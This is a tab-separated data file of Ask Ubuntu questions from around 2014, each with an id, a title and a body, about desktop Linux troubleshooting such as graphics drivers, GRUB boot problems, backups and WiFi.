434972	open office default font	i have imported a document from another ubuntu computer ( made in open office ) . the other computer had the font merriweather installed , which the present system does not . as a result my present system has defaulted to a different font . strangely enough i prefer the default font to my previous choice of merriweather and would like to keep it set to this even if i export this file back to the original computer ( which will have merriweather installed ! ) . trouble is i have no idea which font libre office is currently using , in the bar at the top it says merriweather , but this is obviously not true as it is neither installed nor looked like the font . how do i find out what libre office defaults to on ubuntu and what is the quickest way to divine which font is being used . failing that i attach an image below for anyone with a sharp typographic eye ( but i would prefer to know how to solve this one without simply recognising the font ! )
434979	desktop not loading after changes in grub	i wanted to load my laptop to cli by default . i made a change in /etc/default/grub file and added `` text '' to one of the grub lines as instructed by the online article and did sudo update-grub . it worked and my desktop loads to cli by default . but now when i try to do `` startx '' , it doesnt show my login scree but just my wallpaper for my user . to troubleshoot i undo the changes in /etc/default/grub and did sudo update-grub , now it shows me the login screen but i can login as guest but not as my user . please suggest
434981	is there anyway to write arabic root in libreoffice ?	i have searched in the internet about writing arabic root in libreoffice without any results ? ! is there a way to write an arabic root in libreoffice or not ? thought : the complex text layout has to do nothing with the arabic root or the arabic math symbols .
434983	memory check without rebooting ?	i picked up a laptop at the flea market . seems to be chinese product for internal market . it had windows starter that did n't even boot at all . i installed linux and found out that its motherboard ca n't boot in non-uefi mode at all . so no livecds . in uefi , there in no memstest86+ . how can i ran some memory check of this machine , short of disassembling it and plugging memory somewhere else ? ? ? windows can run memory tests after booting , can we ?
434984	amd/ati hd 6700 and ubuntu 12.04 bad perfomance in games	i have ubuntu 12.04 , and i 'm using an ati hd 6700 graphics card , but i have very low performance in games with higher graphic requirements . the games go to little stops and it 's impossible playing them . i 'm using fgrlx private drivers ( 13.30 ) , installed by option additional drivers from ubuntu control panel , and i changed by firegl drivers , but it 's the same thing . i can not play games like left for dead 2 , brutal legend or painkiller . no problem with 2d games like do n't starve or mark of ninja . my computer is a amd phenom quad core 2.2 ghz and 8gb ram , this games in windows 7 work ok. my questions are : do you recommend install manually the last drivers from ati ( 14.02 ) ? or is it better wait until this driver will be automatically installed by ubuntu ppa in next updates ? do you think this is a problem with ubuntu or is there something misconfigured in ubuntu ? my x11 config file is : section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` module '' load `` glx '' endsection and fglrxinfo in terminal : display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6700 series opengl version string : 4.3.12682 compatibility profile context 13.30 i appreciate help .
434985	ubuntu 13.10 boot to grub everytime , but not ubuntu or windows	i am newbie and i have searched through the network and did a lot of things i do n't understand . i got this problem by reinstalling ubuntu 13.10 with the following option : deleting the original ubuntu 13.10 i have used boot-repair , trying to solve it , but it just shows me other problems i do n't understand . please refer to this output/report http : //paste.ubuntu.com/7101061/ . here 's what i did to boot-repair : open boot-repair . choose recommended repair . after a while , three problems appeared . please enable a repository containing the [ linux ] packages in the software sources of ubuntu 13.10 ( sda6 ) . then try again . please enable a repository containing the [ grub2 ] packages in the software sources of ubuntu 13.10 ( sda6 ) . then try again . `` software & updates '' poped up and said : there are no sources to install software from /mnt/boot-sav/sda6/etc/apt/sources.list
434986	how to install the proprietary amd graphic driver ( fglrx ) correctly via the amd website ?	this question currently aims to describe how to install the proprietary drivers for amd graphic cards from the amd website . refer to this question for other ways to install it . please do n't get misled by the description below . the question here was actually this : how to backup all software ( include ones not installed from software centre ) including proprietary graphics drivers ? this was the description provided when the immediately above question was there : i am using ubuntu 12.10 . i want to move on to 13.10 ( the latest version of ubuntu , i suppose ) . but it seems upgrading takes lot of time . so i want to do a fresh install of 13.10 . if i do that i will be losing all the software and settings ( as you know ) . so i have to backup all software including the non-software-centre ones . i dont know how to do that ( i have never backed up before ) . i also want to backup my fglrx driver for my ati radeon 5570 hd graphic card because when i first installed 12.10 i had to undergo some pain getting that driver to work ( by following the steps here : ca n't install ati proprietary drivers in 12.10 ) and i dont want to undergo that again . so help please ! ! ( p.s : i am a complete amateur . i have just been introduced to and been using ubuntu for just 3 months . so please give easy to understand explanation ( i.e ) dont get too technical ) by the comments provided below and by my experience i was able to learn a correct way to install the amd graphic card driver . therefore to help future vistors the question above was changed . the answer below ( by myself ) answers the current question .
434988	internal microphone not working with ubuntu 13.10 on compaq cq-45	i am unable to get the internal microphone working with ubuntu . it works perfectly with windows . here is the output of lspci : 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) 01:05.1 audio device : advanced micro devices , inc. [ amd/ati ] rs780 hdmi audio [ radeon ( hd ) 3000 series ] i am using a laptop compaq cq-45 with an amd turion x2 64 bit processor with ubuntu 13.10 32-bit version .
434989	why i can not download software on ubuntu ?	i have found out that suddenly i am unable to install anything on my ubuntu distro . every time i try sudo apt-get install anything i actually get the same error message : ubuntu @ ubuntu : ~ $ sudo apt-get install adobe-flashplugin reading package lists ... done building dependency tree reading state information ... done e : unable to locate package adobe-flashplugin how can i solve this problem ? thanks ) ) )
434996	jlink ide and uploading to a development board	i 'm starting to get int the basics of electronics and i have a development board and using a j-link ( segger ) to hopefully debug and upload to the board . the problem is that i can not figure out how to upload to the board using ubuntu . i have installed the sdk ( command line ) and i have tried to use the command fwrite but it says that file i/o is not supported . does anyone have any ideas to where i can download an ide which would allow me to communicate and upload to the board using the segger j-link ? thanks
434997	change lubuntu 12.10 window minimize animation	the windows minimize abruptly but that 's ok. also they minimize to the bottom which would be ok but i moved my panel to the top so it does n't `` make sense '' anymore . how can i reverse this behaviour ?
434998	dconf-editor does n't > remember '' rhythmbox library settings in ubuntu 12.04	i 've been trying to edit the list of library locations in rhythmbox using the instructions here , but upon reboot , rhythmbox reverts to `` multiple library locations '' in its preferences . if i open dconf-editor , the rhythmbox settings reflect any other changes i 've made ( monitor-library on or off , days before dead entries are removed ) , but the music library locations revert to the location of my library ( an ntfs partition on my hd ) and the `` ubuntu store '' location . the heart of the issue is not having to re-import all of my music into rhythmbox every time i start my computer ; i thought being able to `` fix '' the library locations might be an answer , but i do n't seem to be having much luck with even that .
434999	recovery disc data - two disk mounted in one file o_o	i need to recover data from the disk scsi-sata_st3120026a_5jt4g6c1 . the bios can see this disk but is reporting a size of 0,0 gb . the system can not see it by uuid . the system sees it , but it seems like ubuntu mounts both disks in one file /dev/sdb . /dev/disk $ tree . ├── by-id │ ├── ata-st3120026a_5jt4g6c1 - > ../../sdb │ ├── ata-st3120026a_5jt4g6c1-part1 - > ../../sdb1 │ ├── ata-st3120026a_5jt4g6c1-part2 - > ../../sdb2 │ ├── scsi-sata_st3120026a_5jt4g6c1 - > ../../sdb │ ├── scsi-sata_st3120026a_5jt4g6c1-part1 - > ../../sdb1 │ ├── scsi-sata_st3120026a_5jt4g6c1-part2 - > ../../sdb2 │ ├── usb-adata_usb_flash_drive_aa04012700008016-0:0 - > ../../sda │ └── usb-adata_usb_flash_drive_aa04012700008016-0:0-part1 - > ../../sda1 ├── by-path │ ├── pci-0000:00:13.2-usb-0:1:1.0-scsi-0:0:0:0 - > ../../sda │ ├── pci-0000:00:13.2-usb-0:1:1.0-scsi-0:0:0:0-part1 - > ../../sda1 │ ├── pci-0000:00:14.1-scsi-0:0:0:0 - > ../../sdb │ ├── pci-0000:00:14.1-scsi-0:0:0:0-part1 - > ../../sdb1 │ └── pci-0000:00:14.1-scsi-0:0:0:0-part2 - > ../../sdb2 └── by-uuid ├── 22886f9d-d03e-4224-b6b1-6aa7033f21b5 - > ../../sdb1 ├── d2ed3de1-705d-4178-998b-c2556bd441a4 - > ../../sdb2 └── e0f5-5936 - > ../../sda1 sudo fdisk -l disk /dev/sda : 4057 mb , 4057989120 bytes 255 heads , 63 sectors/track , 493 cylinders , total 7925760 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sda1 63 7925759 3962848+ 6 fat16 disk /dev/sdb : 120.0 gb , 120033041920 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234439535 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000777ce device boot start end blocks id system /dev/sdb1 * 2048 220000255 109999104 83 linux /dev/sdb2 220000256 234438655 7219200 82 linux swap / solaris ls /dev/sd* /dev/sda /dev/sda1 /dev/sdb /dev/sdb1 /dev/sdb2 it is important for me to dump data from this file . what can i do besides the tipped hard disk ?
435000	installing ubuntu on extra hdd	i 've got three hdds in my setup , with win7-64bit running on my main one . now i 'd like to install ubuntu on a secondary hdd and be able to choose between it and windows at the boot screen ( while maintaining windows as the automatically booted os ) . i do n't believe what i mean to do is `` partitioning '' , but then again i 'm not totally sure what it should be called . could anyone instruct me as to how to begin ( and proceed , for that matter ) ? i plan on dedicating all 320gb of this secondary drive to ubuntu , but do n't want to partition either of my other hdds or potentially lose data . note : this 320gb hdd has been used before , so i will need to format it , but in windows it only gives me the option to format it in ntfs . thanks in advance .
435002	which language is most completly translated , russian or polish ?	my mom is switching to ubuntu because xp support is ending , her english is n't great but she speaks both russian and polish natively . which language is most completely translated , russian or polish ?
435005	can not find -lxi	i am trying to compile and run an opengl/glut program i created on another pc on my virtual machine ubuntu at home . i 've installed freeglut3 and the other opengl libraries , but when i try to compile i get : can not find -lxi this is the line in my makefile : ldlibs=-lgl -lglew -lglut -lglu -lx11 -lxi -lm i can not seem to find which library it is i still need to install ? thanks for the help
435009	noob : uninstall eclipse from 12.04 precise	i 'm very new to ubuntu . today i 've installed eclipse kepler , i got it not from the terminal , not from the software center but from their website . it simply downloaded .tar.gz file which i extracted and run a file . now i have to change it to indigo version so i 'd like to uninstall kepler , what do i need to do ?
435011	3 tb hard drive suddenly no longer recognized	my 3tb western digital wd30exrx hard drive that used to work perfectly fine , is suddenly no longer being recognized properly . it is n't mounted automatically anymore , the file manager does not recognize it at all and in gnome-disks it is shown as an empty hard drive with 802gb of free space . what could possibly be a reason for this and what can i do to repair the disk/recover the data ?
435012	suspend computer and turn screen off gradually	i am looking for a feature that i had before and i ca n't find no more . at first , my screen would turn off gradually after being inactive for whatever many minutes it was set to . this gradual dimming was particularly useful when watching movies because it would anticipate me to move the mouse quickly before it went full dark . and then i tried installing a screensaver and tweaked with ubuntu here and there . unfortunately , the screensavers that i found did n't convince me to use them . but after the tweaking , the screen will turn off not gradually . i wonder if someone knows how to set that up . thanks .
435017	how to compile pcsxr as 32bit	i want to compile pcsxr as a 32bit software but i am using a 64 bit system so can anyone help me with this . thank you in advanced
435018	getting errors when i try to install lubuntu	i have a notebook with these specs : hp pavilion dm1 notebook amd e-450 apu with radeon ( tm ) graphics 1.65 ghz 4.00 gb ram 32 bit operating system i can not get lubuntu to install . i have installed the iso to the usb drive and changed the bios to lauch from usb but i am still getting the following message : ( initramfs ) unable to find a medium containing a live file system . how can i install lubuntu ?
435019	how to add a scrollable time bar to the sound indicator	the ubuntu sound indicator is nice because you can pause the playing song , go next or previous . is there a way to add a scrollable time bar to that interface for the playing song ? i got the idea from a mockup in deviantart edit 1 i think it 's possible . i found this screen shot here even though it 's from 2010 : - ) edit 2 i would like a global solution not just for rhythmbox like shown in the screenshot above . a global solution means that it can be used for controlling the current playing song irrespective of the media player used , be it vlc , banshee , rhythmbox , audacious etc . edit 3 since a global solution is kinda impractical ( see comments below ) , how about for vlc only ? it 's practically the only media player i use .
435020	after upgrade , no boot	i recently tried to upgrade 12.04 lts to 12.10 after which my machine ( which is dual booted with windows 7 ) refused to boot to the new install/upgrade . long story short : i subsequently re-installed the 12.04 using all the same log-in info from before hoping to save my data , this was successful , however now all files from my previous installation are on a separate partition . is there anyway to re-integrate this partition , i had configured ubuntu to use practically half of my 320g drive and while i still can access this partition ; installation of certain programs i had on there will be drastically limited due to the limited space i now have . also i 've discovered that the current installation shows a locked sign on the partition in gparted , can this be unlocked ? ... any solutions/ideas ? ? ... would be welcomed . thanks in advance .
435021	wine + world of warcraft	i have a 2500k , 20gb of ram , and a amd hd7970 so hardware resources are a plenty . i am averaging 15-20 fps on a system which would normally get 100 or so fps on windows . i understand i wo n't get full performance , but something seems fishy . ubuntu 13.10 lxde and compiz proprietary amd driver ( tried both 13.10 and 14.2 beta ) altering graphical settings makes a minimal difference in fps . low : 15fps . high : 11fps . altering resolution makes almost no difference in fps 2560x1600 : 15fps , 1024x768 : 16fps have tried various wine versions from 1.5 to 1.7.13 with no difference similar performance under opengl and dx9 have tried the disabledextension registry tweak for opengl anyone have any suggestions for other ways to debug this ?
435023	how can i switch between windows with an active corner like in gnome 3 ?	the title basically says it . i want to switch fastly between windows without using the keyboard . how do i do that in unity ? `` how does gnome 3 do it ? `` : gnome 3 has an active corner in the upper left ( that was used by unity to show the launcher earlier ) . it shows all windows on one screen , so you can select which you want to focus on .
435024	evolution calendar clock menu not working	i am new to ubuntu , so apologies upfront if my terminology is not accurate . seeing that the clock menu allows for evolution mail and calendar to show its calendar part , i set it up using my caldav account calendars of mac os x 10.6 server i am running . at first , it appears that it worked , but once i was happy about how all is set up ( e.g . installing other applications , etc . ) , i degraded my user to be a standard user ( having another user as an admin if required ) to increase security . when calling up evolution mail and calendar , it all seems to still look fine . however , clicking the clock menu , it does not show the events any more , but even worse , once having clicked there , all events within the main application disappear as well . i can restart the application to reproduce the issue every time . is there a setting or config file i need to touch ? as a side note : the main application occasionally ( most-likely the first time after logging in to the account ) repeatedly asks for the credentials of the `` default calendar '' with multiple password windows popping up on top of each other . however , neither did i change the password , nor did i remove the passwords from evolution . quitting and re-opening evolution typically fixes it . just mentioning this as it may be related .
435025	full apps directory not available in software center	can anyone tell me what depository i 'm missing ? if i search for say `` apache '' at apps.ubuntu.com it comes up with what i 'm looking for , if i search for it in the software center all it comes up with are books and maybe some games . right now it looks like it 's using the following sources : http : //extras.ubuntu.com/ubuntu thank you , david
435026	ubuntu one always logs me out	is the ubuntu one log in service having issues ? because each time i open the android client it asks me to sign in . it seems to work fine on desktop though . any help ?
435027	driver for ati radeon 7500	when i installed ubuntu on my computer it did not select a graphics driver . in the ubuntu software center i searched radeon and found ati graphics drivers and it installed v200 which is correct.ubuntu is now giving me an error so i probably need to change some settings . ( the video is shifted a bit to the left but apart from that is ok ) . if you know what setting changes are needed , that would be helpful .
435028	i updated from 13.04 to 13.10 , and now ubuntu wo n't boot at all	i think something must have gone wrong with the update process from 13.04 to 13.10 , as i now have duplicate entries for each option in my boot menu when i turn on my computer . when i attempt to boot into ubuntu , i get a white error box on a black background entitled `` the system is running in low graphics mode '' . the cursor does n't appear on screen , but i can progress using the enter key . after this screen , i get another error box asking what i 'd like to do , with options to : run in low-graphics mode just for one session ; reconfigure graphics ; troubleshoot the error ; and exit to console login . here i lose all control . i 'm unable to move between options or even select the first and progress . the only thing i can do is turn the computer off and reboot . my windows boot is still working , so i 'm considering deleting my ubuntu partitions and trying a clean install . however i 'm worried about deleting the wrong partition . any advice on either working around the problem with my ubuntu boot , or on successfully deleting the ubuntu partitions would be greatly appreciated . thanks , j
435032	undefined reference to gl/glut functions	i 'm trying to compile a c++/opengl program i created on another machine running debian on this machine running ubuntu . i 'm pretty sure i 've installed all the required libraries that i need . when i compile i get the error : /home/hendrik/desktop/prac5/main.c:479 : undefined reference to `glutpostredisplay' with every single gl/glut function . it seems from looking at other threads that it has either got to do with the order in which i am linking my libraries are that the physical files are missing and i have to copy them in somewhere . i 've tried different combinations , but i ca n't get it to work ! here is the header in my main.h : # include < gl/glew.h > # include < gl/glut.h > and in my makefile : ldlibs=-lglut -lgl -lglew -lglu -lx11 -lxi -lm
435033	how long should it take to create a bootable usb drive for windows 7 ?	i followed all the instructions to create a bootable usb drive so i can try ubuntu without actually installing it on my windows 7 machine . everything seemed to be going ok but now it appears to be `` stuck '' and i ca n't tell if it 's doing anything or not . the extract window has been at 99 % for 20 mins now and says it has 1 error - `` can not open outfile autorun.inf . '' the universal usb installer window just says to be patient and the progress bar will not move until the installation is complete . my usb stick looks like it is just `` idling '' and not trying to do anything . i see a bunch of ubuntu files have been installed on it but i have no idea of its actually done or not since the progress bar is not moving . how much longer should i wait before i try to start over ? is there anything i can do to find out if the installation is actually still working or has it frozen up and i need to just start over ? should this be a 5-10 min job or is this something that takes hours to do ? thank you steve
435037	rsync creating target directory with old date	i have a script that automates backups - hourly snapshots of my xubuntu 12.04lts workstation . it creates a directory named according to the date and time , ie : 20140316-1033 , representing 10:33 this morning , march 16th . the backup works flawlessly , hard links functioning as they should . that changed two days ago . i had been running it manually - sporadically , and finally i decided to have cron automate the task , running it once an hour . i changed the verbosity within the script , a couple tweaks as to what was being copied with each backup . so , i apparently changed something , and i can not figure out what i did . when i check the creation date of the target directory , it is always march 14th , 2014 at 11:23 . up until i started fiddling , it worked properly . since then , the creation dates are static . because of this , i have had to change the script so that it uses directory names rather than creation dates of the directories to determine the most recent snapshot for the snapshot . anything you can point me to would be greatly appreciated . thanks in advance . source= '' / '' now= $ ( date + '' % y % m % d- % h % m '' ) base= '' /media/backup-internal/furgesson '' previous= $ ( ls -r $ base | head -1 ) if [ [ `` $ now '' ! = `` $ previous '' ] ] ; then target= '' $ base/ $ now '' link= '' $ base/ $ previous '' options= '' -avh -- delete -- link-dest= $ link '' rsync $ options -- include-from '/home/carolyn/backupscripts/include-list.txt ' -- exclude-from '/home/carolyn/backupscripts/exclude-list.txt ' $ source $ target fi and here is what the directory listing looks like ... total 124 drwxr-xr-x 25 root root 4096 mar 7 04:04 20140314-0445 drwxr-xr-x 25 root root 4096 mar 14 04:48 20140314-0512 drwxr-xr-x 25 root root 4096 mar 14 04:48 20140314-0515 drwxr-xr-x 25 root root 4096 mar 14 04:48 20140314-0821 drwxr-xr-x 25 root root 4096 mar 14 04:48 20140314-0822 drwxr-xr-x 23 root root 4096 mar 14 09:38 20140314-1013 drwxr-xr-x 23 root root 4096 mar 14 11:23 20140314-1140 drwxr-xr-x 23 root root 4096 mar 14 11:23 20140314-1314 drwxr-xr-x 23 root root 4096 mar 14 11:23 20140314-2059 drwxr-xr-x 23 root root 4096 mar 14 11:23 20140314-2128 drwxr-xr-x 23 root root 4096 mar 14 11:23 20140314-2141 drwxr-xr-x 23 root root 4096 mar 14 11:23 20140314-2144 drwxr-xr-x 3 root root 4096 mar 14 11:23 20140315-0846 drwxr-xr-x 3 root root 4096 mar 14 11:23 20140315-0848 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-0849 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-0856 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1125 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1135 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1138 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1405 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1409 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1433 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1533 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1633 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1733 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1833 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140315-1933 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140316-0733 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140316-0833 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140316-0933 drwxr-xr-x 4 root root 4096 mar 14 11:23 20140316-1033
435041	ubuntu slow in virtualbox even with 256mb vram	so i 'm trying this virtualbox software which i heard was relatively good . though i 'm not pleased with the performance that i 'm getting . i 'm running the 13.xx version of ubuntu . i have the fx-8320 . i have switched my vram to 256mb which is maximum and performance has improved . i 'm still thinking that its ' not as fast as i would like . i 'm thinking it might be the cpu which has not been giving enough power but i 'm not sure . i have installed the virtualbox drivers and it did n't really help . any ideas would be greatly appreciated .
435044	ubuntu 12.04 lts not loading	i was starting my laptop and at the stage where it loads the kernel , the screen went purple and nothing happened , so i tried with the ubuntu recovery ( by the way , there were two recovery modes , one was ubuntu , with linux 3.5.0-47-generic ( recovery mode ) and one was just recovery . i used both of them and the first one went ok , but it did not help . so i tried the second one and the output was : error : file not found error : file not found error : you need to first load kernel what should i do ! ? i ca n't get anywhere after this .
435045	sand boxed virtual games pc ?	i have an ubuntu box with 16gb of ram and a dual core cpu and a gt220 gpu ( 1gig ) . i was thinking that maybe for gaming ( i 've a lot of steam titles ) that maybe some sort of virtual windows environment might be the way to go . while the theory is good in my head i actually have very little idea how to go about doing this . i do know that the only windows i could run legitimately would be an xp for which i have several old boxes that do n't really work that have license stickers on them that i could legally transfer the usage rights from . are there any drawbacks to gaming with this approach and can i profile the gpu and memory usage so as to stop my gpu cooking or the game hogging memory ( my gpu does not like to work very hard as it hots up quite rapidly - new fan is on order ) ? basically would you mind assuming that having never done this before i 'm a total newbie in need of some solid advice and directions ?
435046	upgrading from 12.04 to 13.10 ( unanswered questions )	i want to upgrade to 13.10 mainly because i want my computer to recognize my samsung gs4 . i am pretty happy with ubuntu as it 's faster then windows and way more everything , tough it 's hard sometimes with compatibility . i want to know what will happen : -the new stuff ( ok please not everything ) -will this erase stuff i have right now ? ( like folder with music , background , etc ... ) -how long will it take ? -how should i do it ?
435053	no sound over hdmi on desktop 13.10	i have the option for hdmi and have the output set to 100 % but no sound . i get sound from the speaker port on the front of my case and the back but not over hdmi to my tv . i have tried a ton of thing in cli i found on fourms but still nothing is working . i am running an a4 5300 with an asus mobo a55bm-a/usb3 .
435055	xubuntu menu bar disappeared after unplugging external monitor	i 've searched for something similar to this problem and i did n't find it . i apologise if it 's a duplicate . i 'm trying xubuntu installed ontop of my ubuntu 13.10 . i 've been trying to connect an external monitor and extend the desktop . it worked , no complains there . this is the result ( left : latop - right : 24 '' vga external monitor ) : however , when i go back to the laptop screen only the menu bar disappears , as shown on the next screenshot : if i plug in/activate the external monitor again it goes back to work normally as shown earlier . update : output of xrandr as requested ( no external monitor ) screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 32767 x 32767 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 277mm x 156mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 0mm x 0mm hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) hdmi3 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) 1920x1080 ( 0x4d ) 148.5mhz h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz external monitor plugged in : screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 32767 x 32767 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 277mm x 156mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 531mm x 299mm 1920x1080 60.0*+ 1600x1200 60.0 1680x1050 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 75.0 72.8 66.7 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) hdmi3 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis )
435056	gnome encfs manager problem ! seeing all files even after unmount	i am either missing the whole point of that encfs system or fail to understand how the gnome encfs manager works ! when i create a stash i intentionally chose a newly created and empty directory on a mounted external drive / partition . and i use the recommended mount point for that , meaning the to be encrypted folder is on /media/username/data/foldername and the mount point is /home/username/encfs/foldername . so now i when i want to use that it is not working ! ! because : when i start gnome encfs manager it will ask for the given password for mount ( home/username/encfs/foldername ) and it will mount . but : at any time , if mounted or not i can see full clear filenames and have full access to the file in /foldername ! no matter if the folder is unmounted or even if gnome encfs manager is closed . so where is the point ? ? what am i not doing right thanks for any insight
435059	error mounting ubunitu on windows partition , windows 7 hibernated	im a new user of ubuntu , im using edubuntu 12.10 , i hibernated my windows 7 os and is crashed , so i want to access the windows partition bt when i try , i get an error saying : error mounting /dev/sda2 at /media/edubuntu/e6d2021dd201f29b : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/edubuntu/e6d2021dd201f29b '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sda2 /media/edubuntu/e6d2021dd201f29b i just want to read files on my partition , can anyone help me with that ?
435061	run redmine & wordpress together in apache server	how do i run redmine and wordpress in apache server with localhost . apache server is not able to run both redmine and wordpress at the same time . i am sure that i have installed both redmine and wordpress and the database mysql has also been created . but i cant run them both . even apache is not running . need some help to solve this problem .
435065	ubuntu chromium sometimes does n't load pages	this is my chromium version string : 32.0.1700.107 ( developer build 32.0.1700.107-0ubuntu0.13.10.1~20140204.972.1 ) ubuntu 13.10 i am having issues with pages loading . immediately after opening the browser , pages do not load . all i get is the title , with a blank page . the request is going through ; that 's not the issue . i can inspect the headers , etc . this leads me to believe it is some sort of rendering issue . after opening a couple of tabs and loading a couple of other pages , the pages start to actually display . this happens almost every single chromium startup . it affects the first few tabs open/pages `` loaded '' ( usually by the 5th they render ) . what could be the issue ? edit alright , we 're in business ! i ran chromium-browser from the terminal and the first three tabs gave this message : libgl error : open uki failed ( operation not permitted ) libgl error : reverting to ( slow ) indirect rendering subsequent tabs ( i.e . the ones that actually rendered ) did not print any error message . now , what does this message mean ? edit 2 output of inxi -g : graphics : card : advanced micro devices [ amd/ati ] wrestler [ radeon hd 6310 ] x.org : 1.14.5 drivers : ati , fglrx ( unloaded : fbdev , vesa , radeon ) resolution : 1366x768 @ 60.0hz glx renderer : amd radeon hd 6310 graphics glx version : 4.2.12337 - cpc 13.101 i feel like it may be an issue with the ati fglrx drivers .
435066	how to skip boot-time fsck check preferably by editing grub menu-entry ?	i want to make an menuentry in grub , which boots up as normal but skips fsck . if that is possible , i could create two menu-entries one of which would skip filesystem check and the other would not . my /etc/fstab file looks like below , # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda7 during installation uuid=0a0fda6a-a0af-461f-936e-fe6feff3adba / ext2 errors=remount-ro 0 1 # /home was on /dev/sda5 during installation uuid=b9ed5358-a68a-48ef-8c51-7241f0462913 /home ext4 defaults 0 2 # swap was on /dev/sda6 during installation uuid=301dcfce-1bb3-415d-a71a-df64add29443 none swap sw 0 0 /dev/sr0 /media/cdrom0 udf , iso9660 user , noauto 0 0
435069	how can i know when my screen was locked last time ?	exist a log where i can look for that information ? i want to know last days when my pc automatically locked the screen because was idle .
435072	why does n't the full amount of ram appear ?	i just upgraded by gateway dx300x pc running ubuntu 13.10 with a full 4gb of ram . the specs say it should be able to handle this but when i check the system settings it only shows 3.2gb of ram . is this normal ? i never upgraded a pc running linux so i 'm not sure if it should display the full amount of ram . the pc previously had 2gb and it always displayed 2gb in the system settings . the upgrade involved 4 separate sticks of ram that were brand new . thanks for any replies ... ..
435078	ubuntu 13.1 wifi authentication did n't do anything	just install ubuntu 13.10 on my second pc to try a linux os . i 'm working as developer on windows based platforms but i 'm completely fresh in linux/ubuntu . when i try to connect to wifi ( wifi adapter seems to work properly- i can see the networks ) , i enter the password ( i 'm using wpa2-psk ) hit 'connect ' but after couple of seconds i receive the authentication dialog again ( i double checked the password- it 's correct ) . it 's seems that the network adapter ca n't authenticate the connection with the router although the password is right . my network adapter : realtek rtl8187se wireless lan controller . as offered in several others answers , i tried to remove and forget the network that i trying to connect , restart the system and connect again . but it did n't help . thanks !
435079	dual boot enabling and desabling secure boot	i had windows 8.1 in the ssd of my notebook with uefi . i installed ubuntu 13.10 in the hd . after rebooting , the pc went directly to windows . i boot into the live cd of ubuntu and executed boot-repair . only that after that , i could't boot into anything that the system show the following error : `` no such device : xxxxx-xxxxx-xxxxx-xxxxx , grub rescue '' . but then , after changing setting on the bios , i found that after enabling and after rebooting desabling the secure mode i would see the grub working normally , showing both the os 's . the only problem is after i reboot the system after selecting the os in the grub screen , the error `` no such device '' is shown again , and for me to get into any os again i need to enable and disable the secure mode on the bios . any suggestions ? sorry for my bad english . : )
435084	mac ibook g4 crashed , how to make bootable ubuntu for mac	i have a mac ibook g4 , which is not booting at all and it requires 'os x recovery cd ' , which i do not have . so i wanted to install ubuntu on , which i already use on another system . a step by step guide , for burning the .iso image , or a bootable usb version guide for ubuntu 13.10 for my ibook is highly appreciated .
